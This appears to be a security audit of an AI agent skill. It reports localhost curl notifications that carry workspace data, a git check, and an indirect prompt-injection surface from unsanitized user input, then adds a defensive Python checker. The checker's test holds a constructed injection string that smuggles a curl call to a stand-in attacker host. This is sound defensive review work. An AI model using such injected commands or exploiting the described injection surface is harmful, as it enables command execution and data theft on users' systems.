CORE
Warn
Audited by Gen Agent Trust Hub on Apr 7, 2026
Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill requires the agent to execute shell commands as part of its internal lifecycle and safety protocols.
  - Algorithm.md: Mandates 'curl' requests to 'http://localhost:8888/notify' at the entry point of the algorithm and at every subsequent phase transition (Observe, Think, Plan, etc.).
  - SKILL.md: Instructs the agent to run 'git remote -v' before any git commit to verify the remote repository configuration.
- [DATA_EXFILTRATION]: The skill performs automated network operations that transmit internal state and task summaries.
  - Algorithm.md: The mandated 'curl' calls send JSON payloads containing status messages and voice identifiers to a local network endpoint. The target is localhost, but the payloads carry data derived from the agent's workspace and task execution, and the skill does not identify the process expected to listen on port 8888; whatever is bound to that port receives them.
- [PROMPT_INJECTION]: The skill's architecture for categorizing and routing user requests presents a surface for indirect prompt injection.
  - Ingestion points: User input is scanned for triggers defined in 'semantic-triggers.json' to activate specific skills or to determine the required 'Effort Level' (SKILL.md).
  - Boundary markers: The skill lacks explicit instructions or delimiters that isolate user-provided data, so instructions embedded in that data can influence the agent's transitions through 'The Algorithm' phases.
  - Capability inventory: The agent is authorized to perform shell execution ('curl', 'git'), file system modifications ('Write' and 'Edit' tools in '~/.claude/'), and tool-based sub-agent invocation ('Skill' and 'Task' tools).
  - Sanitization: There is no documented requirement for the agent to validate or sanitize user input before it is summarized or interpolated into notification messages and tool parameters. Because the notifications are shell-invoked 'curl' commands, unsanitized text that reaches the payload can break out of the JSON string or the command line.
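As an added check that is not part of this audit or of the skill itself: the script below inventories the command, endpoint and interpolation surface that the COMMAND_EXECUTION, DATA_EXFILTRATION and Sanitization findings describe, and shows a hardened way to issue the notify request. The two markdown snippets are constructed stand-ins; the real Algorithm.md and SKILL.md are not reproduced on this page, so the exact curl lines and the presence of a `$SUMMARY` splice are assumptions. `build_notify_argv` is a hypothetical hardened form for comparison, not code from the skill.

```python
import json
import re
import shlex

# Constructed stand-ins for the skill files the audit describes; the real
# Algorithm.md and SKILL.md are not on the page, only their reported behaviour.
SAMPLE_ALGORITHM_MD = """\
## Entry
Run: curl -s -X POST http://localhost:8888/notify -H 'Content-Type: application/json' -d '{"status":"entering algorithm","voice":"core"}'
## Observe
Run: curl -s -X POST http://localhost:8888/notify -d '{"status":"observe: $SUMMARY","voice":"core"}'
"""

SAMPLE_SKILL_MD = """\
Before any commit, run `git remote -v` and confirm the remote is the one you expect.
"""

# Shell-looking invocations, URLs inside them, and $VAR / ${VAR} splices.
SHELL_CMD = re.compile(r"\b(curl|wget|git|bash|sh|python3?)\b[^\n`]*")
URL = re.compile(r"https?://[^\s'\"]+")
HOST = re.compile(r"https?://(\[[^\]]+\]|[^/:]+)")
INTERP = re.compile(r"\$\{?[A-Za-z_]\w*")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "[::1]"}


def audit_text(text):
    """Inventory shell commands, network endpoints and shell-variable splices in a skill file."""
    report = {"commands": [], "endpoints": [], "interpolated": []}
    for m in SHELL_CMD.finditer(text):
        cmd = m.group(0)
        report["commands"].append(m.group(1))
        for url in URL.findall(cmd):
            hm = HOST.match(url)
            host = hm.group(1) if hm else ""
            report["endpoints"].append((url, host in LOCAL_HOSTS))
        if INTERP.search(cmd):
            # A $VAR inside a -d '{...}' body means the shell assembles the JSON:
            # quotes or $(...) in the variable land in the payload or the command line.
            report["interpolated"].append(cmd.strip())
    return report


def build_notify_argv(endpoint, status, voice, summary):
    """Hypothetical hardened form: build the JSON with json.dumps and pass it as a
    single argv element, so a task summary cannot end the string or reach a shell."""
    body = json.dumps({"status": status, "voice": voice, "summary": summary})
    return ["curl", "-s", "-X", "POST", endpoint,
            "-H", "Content-Type: application/json", "-d", body]


def parse_payload(argv):
    """Decode the JSON body back out of the argv, to verify the summary survived intact."""
    return json.loads(argv[-1])


def argv_as_shell_line(argv):
    """Quoted one-liner for documenting the command; each element stays one shell word."""
    return shlex.join(argv)


if __name__ == "__main__":
    for name, text in (("Algorithm.md", SAMPLE_ALGORITHM_MD), ("SKILL.md", SAMPLE_SKILL_MD)):
        print(name, audit_text(text))
    hostile = '"; curl http://attacker.invalid/x; echo "'  # constructed hostile summary
    argv = build_notify_argv("http://localhost:8888/notify", "observe", "core", hostile)
    print(parse_payload(argv)["summary"] == hostile)
    print(argv_as_shell_line(argv))
```

Run it against a real skill by replacing the two constants with the file contents; any endpoint flagged non-local, and any `interpolated` entry, is the line to read first. The hardened builder is what a reviewer would ask the skill author for in place of a shell one-liner that splices a summary into the `-d` body.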
Audit Metadata